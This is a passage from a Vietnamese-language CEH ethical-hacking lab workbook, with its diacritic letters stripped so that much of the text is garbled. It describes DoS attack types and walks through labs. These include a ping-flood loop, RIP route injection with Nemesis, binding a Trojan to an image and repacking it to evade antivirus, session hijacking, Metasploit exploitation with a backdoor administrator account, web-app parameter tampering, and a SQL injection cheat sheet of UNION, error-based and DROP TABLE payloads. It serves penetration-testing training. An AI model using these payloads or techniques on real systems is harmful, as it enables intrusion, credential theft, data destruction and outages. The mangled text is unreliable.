- Trong SYN Attack, hacker s gi n h thng ch mt lot SYN packets vi a ch ipngun khng c thc. H thng ch khi nhn c cc SYN packets ny s gi trli cc ach khng c thc v chI nhn thng tin phn hi t cc a ch ip gi . V y lcc a ch ip khng c thc, nn h thng ch s s chi v ch v cn a cc ``request``chi ny vo b nh, gy lng ph mt lng ng k b nhtrn my ch m ng ra l
phi dng vo vic khc thay cho phi chi thng tin phn hi khng c thc ny . Nu tagi cng mt lc nhiu gi tin c a ch IP gi nh vy th h thng s b qu ti dn n bcrash hoc boot my tnh . == > nm du tay .
e . ) Land Attack:
- _ Land Attack cng gn ging nh SYN Attack, nhng thay v dng cc a ch ip khng cthc, hacker s dng chnh a ch ip ca h thng nn nhn. iu ny s to nn mt vng
lp v tn gia trong chnh h thng nn nhn , gia mt bn cn nhn thng tin phn hicn mt bn th chng bao gigi thng tin phn hi i c . == > Gy ng p lng ng .
f . ) Smurf Attack:
- Trong Smurf Attack, cn c ba thnh phn: hacker (ngi ra lnh tn cng), mng khuchi (s nghe lnh ca hacker) v h thng ca nn nhn. Hacker s gi cc gi tin ICMP na ch broadcast ca mng khuch i. iu c bit l cc gi tin ICMP packets ny c ach ip ngun chnh l a ch ip ca nn nhn . Khi cc packets n c a ch broadcastca mng khuch i, cc my tnh trong mng khuch i s tng rng my tnh nn nhn gi gi tin ICMP packets n v chng sng lot gi tr li h thng nn nhn cc gi
tin phn hi ICMP packets. H thng my nn nhn s khng chu ni mt khi lng khngl cc gi tin ny v nhanh chng b ngng hot ng, crash hoc reboot. Nh vy, ch cngi mt lng nh cc gi tin ICMP packets i th h thng mng khuch i s khuch ilng gi tin ICMP packets ny ln gp bI . T l khuch i ph thuc vo s mng tnh ctrong mng khuch I . Nhim v ca cc hacker l c chim c cng nhiu h thngmng hoc routers cho php chuyn trc tip cc gi tin n a ch broadcast khng qua chlc a ch ngun cc u ra ca gi tin . C c cc h thng ny, hacker s d dng tinhnh Smurf Attack trn cc h thng cn tn cng . == > mt my lm chng si nh, chcmy chm li ta nh cho thua .
g . ) UDP Flooding:
- Cch tn cng UDP i hi phi c 2 h thng my cng tham gia. Hackers s lm cho hthng ca mnh i vo mt vng lp trao i cc d liu qua giao thc UDP. V gi mo ach ip ca cc gi tin l a ch loopback (127.0.0.1 ), ri gi gi tin ny n h thng ca nnnhn trn cng UDP echo (7 ). H thng ca nn nhn s tr li li cc messages do127.0.0.1(chnh n ) gi n, kt qu l n si vng mt vng lp v tn. Tuy nhin, cnhiu h thng khng cho dng a ch loopback nn hacker s gi mo mt a ch ip camt my tnh no trn mng nn nhn v tin hnh ngp lt UDP trn h thng ca nnnhn . Nu bn lm cch ny khng thnh cng th chnh my ca bn s by .
7/28/2019 VanLuong.blogspot.com CEH
67/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 67
h . ) Tn cng DNS:
- Hacker c thi mt li vo trn Domain Name Server ca h thng nn nhn ri cho chn mt website no ca hacker. Khi my khch yu cu DNS phn tch a ch b xmnhp thnh a ch ip, lp tc DNS ( b hacker thay i cache tm thI ) si thnh a chip m hacker cho chn . Kt qu l thay v phi vo trang Web mun vo th cc nnnhn s vo trang Web do chnh hacker to ra . Mt cch tn cng t chi dch v tht huhiu !.
g . ) Distributed DoS Attacks (DDos ):
- DDoS yu cu phi c t nht vi hackers cng tham gia. u tin cc hackers s c thmnhp vo cc mng my tnh c bo mt km, sau ci ln cc h thng ny chng trnhDDoS server. By gicc hackers s hn nhau n thi gian nh s dng DDoS client ktni n cc DDoS servers, sau ng lot ra lnh cho cc DDoS servers ny tin hnh tn
cng DDoS n h thng nn nhn .
h.) DRDoS (The Distributed Reflection Denial of Service Attack ):
- y c l l kiu tn cng li hi nht v lm boot my tnh ca i phng nhanh gn nht. Cch lm th cng tng t nh DDos nhng thay v tn cng bng nhiu my tnh th ngItn cng ch cn dng mt my tn cng thng qua cc server ln trn th gii . Vn vi
phng php gi mo a ch IP ca victim, k tn cng s gi cc gi tin n cc servermnh nht, nhanh nht v c ng truyn rng nht nh Yahoo .v.v, cc server ny s
phn hi cc gi tin n a ch ca victim . Vic cng mt lc nhn c nhiu gi tinthng qua cc server ln ny s nhanh chng lm nghn ng truyn ca my tnh nn nhn
v lm crash, reboot my tnh . Cch tn cng ny li hi ch ch cn mt my c kt niInternet n gin vi ng truyn bnh thng cng c thnh bt c h thng c ngtruyn tt nht th giI nu nh ta khng kp ngn chn . Trang Web HVA ca chng ta cng
b DoS va ri bi cch tn cng ny y .
(Trch dn Netsky (vniss))
II/ M t bi lab:
Bi Lab 1: DoS bng cch sdng Ping of death.
Ngoi vic sdng cc tool Nemesy ta cn c th sdng lnh sau c th khi ngping of death
For /L %i in (1,1,100) do start ping [ip victim] l 10000 -t
7/28/2019 VanLuong.blogspot.com CEH
68/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 68
Ta c th chy cu lnh ny nhiu ln, c th lm cho my Client b DoS honton.
7/28/2019 VanLuong.blogspot.com CEH
69/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 69
Bi lab 2: DoS 1 giao thc khng sdng chng thc(trong bi sdng giao thc RIP)
Trong bi ny chng ta s dng Cisco router chy phin bn RIP version 1 v sdng tool Nemesis t my CD Boot Linux chn vo cc thng ip RIP update trnRouter. Router khi nhn c thng ip update s lu li trong bn nh tuyn. Do vy ta cth thc thi chng trnh Nemesis nhiu ln v lm cho b nhca Routery.
Trc tin ta thlnh sau:nemesis rip -V 1 -c 2 -i 192.168.5.0 -S 192.168.1.51 -D 192.168.1.254
Trong V 1 l ta ang s dng rip version 1, -c 2 l thng tin update, -i192.168.5.0 l route m chng ta qung b, -S 192.168.1.51 l a ch ngun thng tin(c thkhng phi l a ch ca PC, -D 192.168.1.254 l a ch ca fa0/0 Router VSIC1. Sau khithc hin lnh ny, ta kim tra trn router c route ny cha, sau son 1 script c ccroute khc nhau v chy script.
7/28/2019 VanLuong.blogspot.com CEH
70/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 70
Qu trnh inject packet vo Router
7/28/2019 VanLuong.blogspot.com CEH
71/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 71
Router s b trn Memory
Bn nh tuyn ca Router lc tn cng
Nh vy vi vic chn vo nhng thng tin update ca giao thc khng chng thc,chng ta c th lm cho Router khng hot ng c. iu ny ni ln tm quan trng ca
7/28/2019 VanLuong.blogspot.com CEH
72/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 72
chng thc. Trung Nemesis cn rt nhiu option v cc giao thc ARP, OSPF v.v. Hc vinc th t test nhng giao thc cn li.
Bi Lab 3: Sdng flash DDoS
Ngoi vic tn cng trc tip thng qua cc giao thc nh l RIP, OSPF, ARP v.v.Hacker cn c th s dng cc file flash ln cc forum, khi ngi s dng chy file flashny(c th l on phim ) th ng thi s gi HTTP POST n nn nhn. Nh vy nunh file flash ny c ti ln nhiu forum cng nhc nhiu ngi xem cng 1 lc, th vtnh cc Server cha cc file ny tn cng DoS vo Server nn nhn.
Ta s dng file Flash trong CD (Module 8)sau , chy file ny bng internetexplorer, phn tch bng webscarab proxy.
7/28/2019 VanLuong.blogspot.com CEH
73/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 73
File flash mrt nhiu ca s Internet Explorer v mi explorer gi HTTP POSTv pha Server nn nhn.
7/28/2019 VanLuong.blogspot.com CEH
74/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 74
Bi 7:
Social Engineering
I/ Gii Thiu
K thut la o (Social Engineering) l mt th thut c nhiu hacker s dng chocc cuc thm nhp vo cc h thng mng, my tnh. y l mt trong nhng phng thchiu qunh cp mt khu, thng tin, tn cng vo h thng.
Di y l cu chuyn c tht v mt trong nhng hacker ni ting nht th giitrong vi nm trli y - Kevin Mitnick (M, tng b 8 nm t v ti tn cng vo h thngmy tnh), chuyn gia hng u v k thut Social Engineering. Ln k hoch tn cng vocng ty X, Kevin vn dng k nng ny d tm thng tin lin quan n ng tng gim cv mt tr l ca ng ny. Li dng lc hai ngi i cng tc, anh ta s dng Call ID gi,
nhi ging ni ca vin trl gi n qun tr mng cng ty, yu cu gi mt khu ngnhp vo h thng ca tng gim c v ngi qun mt khu. Qun tr vin kim tra mtvi thng tin v "vin trl", nhng Kevin c thng tin v s khn ngoan tr li. Ktqu l Kevin ly c mt khu v kim sot ton b h thng mng ca cng ty X.
Mt hnh thc la o khc: Mt ngy... xu tri no , bn nhn c in thoi,u dy bn kia l mt ging ni ngt ngo: "Cho anh, dch v m anh ang s dng ticng ty chng ti hin ang b trc trc vi account (ti khon) ca anh. ngh anh gi gpthng tin v ti khon cho chng ti iu chnh li". Mi nghe qua tng nhy l mtkiu la th thin, nhng xc sut thnh cng rt cao, c bit khi ging ni d thng nhmy c trc tng i 1080! Phng cch la o tng t l dng k thut "Fake Email
Login". V nguyn tc, mi khi ng nhp vo hp th th chng ta phi in thng tin tikhon gm username v password ri gi thng tin n mail server x l. Li dng iuny, hacker thit k cc trang ng nhp gi (Fake Login) cc thng tin c gi ncho h.
Tm li, k thut Social Engineering rt a dng, phong ph v cng ht sc nguyhim do tnh hiu qu v s ph bin. K thut ny khng i hi phi s dng qu nhiu yut k thut, thm ch khng c lin quan n k thut thun ty (non-technical). Hacker c ththc hin phng cch ny thng qua th tn, e-mail, in thoi, tip xc trc tip, thng quangi quen, cc mi quan h c nhn... nhm dn d, khai thc cc thng tin do v tnh b titl t pha ngi dng. VN, k thut ny cn kh mi nn khng him trng hp bnhla mt cch d dng. Chng hn nm ngoi, hng lot game th MU Global mt schsnh sanh ti sn (o), khi ngy thin thng tin ti khon ca mnh vo mt e-mail gi moadmin MU ca hacker!
(Trch dn)
II/ Cc bi Lab:
Bi Lab 1: Gi email nc nh km Trojan
7/28/2019 VanLuong.blogspot.com CEH
75/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 75
thc hin bi Lab ny, ta s dng chng trnh Mini-binder ghp file trojan vihnh nh, thay i icon v chng trnh Outlook gi email nc danh.
Ghp file hnh nh v file trojan, u tin ta to 1 file trojan, ly 1 file nh v file icobt k ghp.
Ta s dng lnh MMB 60.ico svchost.exe cathu.jpg trojanhao.exe ghp file trojan svchost.exe vi cathu.jpg v vi icon l 60.ico.
Tip theo, ta nn file trojan mi bng Winrar li nhiu ln trnh chng trnh Anti-virus(ty theo phin bn Anti-virus, tuy nhin hu ht cc trojan khng qua mt c ccchng trnh ny) v thay i thng tin ca outlook.
7/28/2019 VanLuong.blogspot.com CEH
76/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 76
Ta vo ToolOptionMail setupView Account Chn Account cn thay i vthay i thng tin Your Name v E-mail Address.
Tip theo Attach file nh km vo v gi Email i. Trong bi Tc gi gi ti a chemail [email protected], v sau check mail kim tra th xem mail n cha.
7/28/2019 VanLuong.blogspot.com CEH
77/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 77
Bi 8:
Session Hijacking
I/ Gii thiu:Nh ta bit v sniffer (nghe ln trong mng), Hacker c th ly bt k thng tin g
khng c m ha, hay c th fake CA c th ly thng tin trong giao thc HTTPS, bygita c thm 1 k thut na l session hijacking. thc hin c bi lab ny trc tin ta
phi s dng ARP spoof, sau s dng phn mm T-sight hay Hunt ginh ly session tpha my nn nhn.
II/ Thc hin bi Lab
Trong bi Lab, tc gi s dng Vmware thc hin, s dng my th nghipTELNET v SSH. Cn 2 my cn li 1 s dng Window 2000( ci sn tool T-sight) v 1 sLinux test SSH.
Vic ci t phn mm kh d dng, bn cn phi thm phn driver v chuyn v IP192.168.200.0/24 do ang s dng bn Trial.
7/28/2019 VanLuong.blogspot.com CEH
78/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 78
Sau khi ci t xong, trn my 192.168.200.1 thit lp cho php cc my khc telnet.V t my 192.168.200.2 telnet n my 192.168.200.1.
V d liu thu c t my 192.168.200.2, s dng tnh nng Take Over trong ToolT-sight ly session.
7/28/2019 VanLuong.blogspot.com CEH
79/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 79
Sau khi Session b ly, session t my Telnet s b Lost connection v ngi sdng trong trng hp ny khng bit l mnh b Lost Connection bi nguyn nhn no.By gi ta bt Service SSH ca my Linux bng lnh Service sshd v test th sessionhijacking i vi traffic ssh.
7/28/2019 VanLuong.blogspot.com CEH
80/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 80
Bi 9:
Hacking Web ServerI/ Gii thiu:
Thng thng Hacking 1 Web Server, Hacker thng phi xem th Web Server
ang chy hiu hnh g v chy nhng sercice g trn , hiu hnh thng thng l cchiu hnh Win 2000 Server, Win 2003 Server, Redhat.v.v. Cc Service bao gm Apache,IIS, FTP Server v.v. Nu nh 1 trong nhng Service ca Hiu hnh b li hay service khc
b li c th dn ti vic mt quyn kim sot ca h thng. Trong bi thc hnh ca phnny, tc gi gii thiu li ca h iu hnh l DCOM v li ng dng khc l Server-U,Apache(FTP Server). T nhng li ny, ta c th kim sot hon ton my nn nhn.
II/ Thc Hin bi lab.
Bi Lab 1: Tn cng Web Server Win 2003(li Apache)
bit c my Server ca h thng c b li hay khng, ta s dng dng phn mm
qut kim tra. (Phn ny c hc trong scaning).
7/28/2019 VanLuong.blogspot.com CEH
81/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 81
Ta khng thy thng tin v FTP Servery, do phn mm Retina ch c tnh nngnhn din cc Service ca Microsoft v nhng Service thng dng. Cn cc Service khngthng dng hn th phn mm ch thy di dng mport. Trong trng hp ny ta thy m
port 21.
Ta s dng Metasploit khai thc li Apache v ly c (Console).
Rank Vulnerability Name Count
1. echo service 1
2. ASN.1 Vulnerability Could Allow Code Execution 1
3. Windows Cumulative Patch 835732 Remote 1
4. Null Session 1
5. No Remote Registry Access Available 1
6. telnet service 1
7. DCOM Enabled 1
8. Windows RPC Cumulative Patch 828741 Remote 1
9. Windows RPC DCOM interface buffer overflow 1
10. Windows RPC DCOM multiple vulnerabilities 1
11. Apache 1.3.27 0x1A Character Logging DoS 1
12. Apache 1.3.27 HTDigest Command Execution 1
13. Apache mod_alias and mod_rewrite Buffer Overflow 1
14. ApacheBench multiple buffer overflows 1
15. HTTP TRACE method supported 1
7/28/2019 VanLuong.blogspot.com CEH
82/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 82
By gichng ta s tm cch Remote Desktop vo my 192.168.200.1. Trc tin tato 1 user v add user ny vo nhm admin bng s dng lnh.
Net user vsichao vsichao /add
//thm userNet Localgroup Administrators vsichao /add
//a user vo nhm Admin
Ta c th kim ta li bng lnh Net user kim tra th user ca mnh c
quyn admin hay cha.
Tip theo ta th remote Desktop vo my bng lnh mstsc /v 192.168.200.6 . Nukhng c ta s dng file Openrdp.vbs mRemote Desktop. Ta s dng chng trnhCisco TFTP Servery file ny Server nn nhn.
S dng lnh tftp my nn nhn ly file
7/28/2019 VanLuong.blogspot.com CEH
83/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 83
Add user vo v nng quyn ln Administrator.
Remote Desktop vo vi user l cehclass thnh cng, nh vy ta hon ton kimsot c my nn nhn.
7/28/2019 VanLuong.blogspot.com CEH
84/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 84
Bi lab 2: Khai thc li ng dng Server UTng t nh bi trn, ta s dng chng trinh nmap xc nh version ca ServerUv s dng metaesploit tn cng.
7/28/2019 VanLuong.blogspot.com CEH
85/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 85
Bi 10:
WEB APPLICATION HACKING
I/ Gii thiu:
ng dng Web thng thng s dng d liu u vo trong cc truy cp HTTP (hoctrong cc tp tin) nhm xc nh kt qu phn hi. Tin tc c th sa i bt k phn no camt truy xut HTTP, bao gm URL, querystring, headers, cookies, form fields, v thm chfield n (hidden fields), nhm vt qua cc cch bo mt. Cc tn cng ph bin dng ny
bao gm:
- Chy lnh h thng ty chn
- Cross site scripting
- Li trn bm
- Tn cng Format string- SQL injection- Cookie poisoning
- Sa i field n
Trong bi thc hnh ny, ta th khai thc cc l hng Cross Site Cripting, Formatstring, Cookie Manipulation, Authorization Failure.
II/ Cc Bi Lab
Bi Lab 1: Cross Site Scripting
u tin ta login vo bng username jv v password jv789 v chn chc nngpost message. Sau ta post script vo phn message text.
7/28/2019 VanLuong.blogspot.com CEH
86/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 86
Sau ta submit post script ny ln. Ta s dng F5 Refresh li trnh duyt vthy xut hin.
Lc ny trnh duyt ca nn nhn v tnh thc hin script c user post ln Server.Da vo script ny, tin tc c thn cp cookie ca nn nhn v log in vo h thng.
Bi Lab 2: Insufficient Data Validation
Trong bi Lab ny khi chuyn tin t ti khon ny sang ti sn khc, tham s amoutlun lun phi ln hn 0. Tuy nhin trong 1 s trng hp Hacker c th thay i con s nyl s m bng nhng chng trnh http proxy. Kt qu ny c th gy hi n cc khon ti
chnh ca ngn hng HackmeBank.
Ta th chuyn vi gi tr Amout 100 t ti khon bt k sang ti khon khc
Kt qu thnh cng. Ta tip tc chuyn thm 1 ln na nhng vi gi tr l -100. Tuynhin do c kim tra di pha client nn vic chuyn tin khng thnh cng.
7/28/2019 VanLuong.blogspot.com CEH
87/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 87
By gita s dng chng trnh Webscarab lm http proxy v thay i thng scPOST ln Server.
Kt qu tr v t Server vic chuyn tin vn thnh cng
7/28/2019 VanLuong.blogspot.com CEH
88/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 88
Ta kim tra trong Transaction thy c lu li vic chuyn tin.
Bi Lab 3: Cookie Manipulation
Trong lc login, ta xem trong Cookie c tham s CookieloginAttempts, tham s nydng lock session khi ai c gng login vo khi nhp sai hay khng bit password. Thams ny m t 5 n 0. Khi tham s ny bng 0 l lc session b Lock. Ta c th s dngWebscarab thay i tham s ny trnh vic Server lock session.
7/28/2019 VanLuong.blogspot.com CEH
89/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 89
Bi Lab 4: Authorization Failure
u tin ta vo xem cc account ca user jc password jc789.
Ta thy account Number l 5204320422040005, 5204320422040006, 520432
0422040007, 5204320422040008. User jc ch qun l c cc account thng s trn. Tuynhin ta ch n phn URL khi s dng tnh nng View Transaction.
7/28/2019 VanLuong.blogspot.com CEH
90/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 90
Ta thay thng s 5204320422040005 bng thng s 5204320422040004(thng s nykhng thuc account qun l ca user jc). Nh vy web site ang b li phn quyn.
7/28/2019 VanLuong.blogspot.com CEH
91/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 91
Bi 11:
SQL INJECTION
I/ Gii thiu v SQL Injection:y l Kthut tn cng ny li dng nhng l hng trn ng dng(khng kim tra k
nhng k t nhp t ngi dng). Thc hin bng cch thm cc m vo cc cu lnh hay cutruy vn SQL (thng qua nhng textbox) trc khi chuyn cho ng dng web x l, Server sthc hin v tr v cho trnh duyt (kt qu cu truy vn hay nhng thng bo li) nh mcc tin tc c th thu thp d liu, chy lnh (trong 1 s trng hp) v sau cho c th chimc quyn kim sot ca h thng. Sau y l 1 s th thut cn bn
1) Ly tn table v column hin hnh:Structure:
Login page (or any injection page)::::username: ' having 1=1--
KQ: -------------------------------[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.ID' is invalid in theselect list because it is not contained in an aggregate function and there is no GROUP BYclause.------------------------------------------> Ta c c TABLE VICTIM
Tip tc
username: ' group by VICTIM.ID having 1=1--
KQ:---------------------------------[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'VICTIM.Vuser' is invalid in theselect list because it is not contained in either an aggregate function or the GROUP BYclause.-------------------------------------------Vy l ta c column Vuser
UNION nh m hiu qu
Vng tha cc bn, ta c th dng n ly c gn nh mi th .
Trc ht ti xin ni squa ci Structure ca n:
Login page::::
username: ' Union select [column] from [table] where [column2=...]--password: everything
Vd: Gi s ta bit 2 column username v password trong table VTABLE cua db victim lVUSER v VPASS th ta lm nh sau
7/28/2019 VanLuong.blogspot.com CEH
92/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 92
username: ' Union select VPASS from VTABLE where VUSER='admin'-- (1)password: everything
(1): Trong trng hp ny admin l mt user m bn bit nu khng c th b trng, n scho bn useru tin
KQ:-----------------------------[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statementcontaining a UNION operator must have an equal number of expressions in their target lists.---------------------------------
Nu KQ ra nh trn c ngha l bn phi union thm nhiu column na tt c column catable VTABLE c Union ht. Structure ca n nh sau:
username: ' Union select VPASS,1,1,1...1,1 from VTABLE where VUSER='admin'-- (1)password: everything
Bn hy thm ",1" cho n khi kt qu ra i loi nh
--------------------------------[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarcharvalue 'tuibihackroi' to a column of data type int.--------------------------------
Nh vy Pass ca user 'admin' l 'tuibihackroi'
2) Ly ht value ca mt column bit trong mt table bit
B quyt y l Not in Structure ca n nh sau (s dng v d vi column ca bi trc):Vi Vuser l admin ta c th ly c cc user khc
-----Login Page::::::username: Union select Vuser,1,1,1,1 from Vtable where username not in (admin)-------------------------Sau chng ta s thu c thm mt user na v ch vic chn vo trong Not in (vd: Not in(admin,hacker,.)) c lm tip tc nh th ta s c ht mi user(dnhin sau l mi
password).
**** ly danh sch tn cc user theo mt quy nh m bn chn, v d chi ly cc user c
cha t admin chng hn ta dng like: cu trc
-----Login Page::::::username: Union select Vuser,1,1,1,1 from Vtable where username not in (admin) like%admin%-------------------------
3) Ly ht table v column ca ca database:B quyt chnh l table ny ca database: INFORMATION_SCHEMA.TABLES vi column
7/28/2019 VanLuong.blogspot.com CEH
93/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 93
TABLE_NAME (cha ton b table) v table: INFORMATION_SCHEMA.COLUMNS vicolumn COLUMN_NAME (cha ton b column)
Cch s dng dng Union:
-----Login page:::::::
username: UNION SELECT TABLE_NAME,1,1,1,1 FROMINFORMATION_SCHEMA.TABLES WHERE .---------------------------
Nh vy ta c th ly c ht table, sau khi c table ta ly ht column ca table :
-----Login page:::::::username: UNION SELECT COLUMN_NAME FROMINFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME= and ---------------------------
Trn y l nhng iu cn bn nht v SQl injection m ti c th cung cp cho cc bn, cn
lm c tt hay khng th phi c mt cht sng to na hy vng n gip ch cho cc bnmt cht khi gp mt site b SQl injection
4)Khng sdng UNION:
Nu cc bn ngi dng Union v nhng bt tin ca n th cc bn c th dng "Convert" mtcch d dng hn thu thp info qua cc thng bo li
Structure:
---login page::::
user: ' + convert (int,(select @@version))---------------------------
Trn l mt v d bn ly version, giy mun ly bt c info no bn ch cn thay voci "select @@version" nhng nhnu l ln u tin get info th thm TOP 1 vo nh
vd: user: ' + convert (int,(select Vpass from Vtable where Vuser='admin'))--
Lu : Nu cc bn s dng khng c th c th v du + khng c chp nhn, lc hy thay n === %2b
vd: user: ' %2b convert (int,(select Vpass from Vtable where Vuser='admin'))--
5) Run command SQL:
run command bn c th dng du ";"
Structure:
7/28/2019 VanLuong.blogspot.com CEH
94/120
Gio trnh bi tp C|EH Ti liu dnh cho hc vin
VSIC Education Corporation Trang 94
login page:::::user:' ; [command]-------------------------------
vd: '; DROP TABLE VTABLE--
II/ Thc Hnh Bi Lab
Trong bi ny Hacker (my 192.168.1.44) s thng qua Port Web tn cng voServer 2000(192.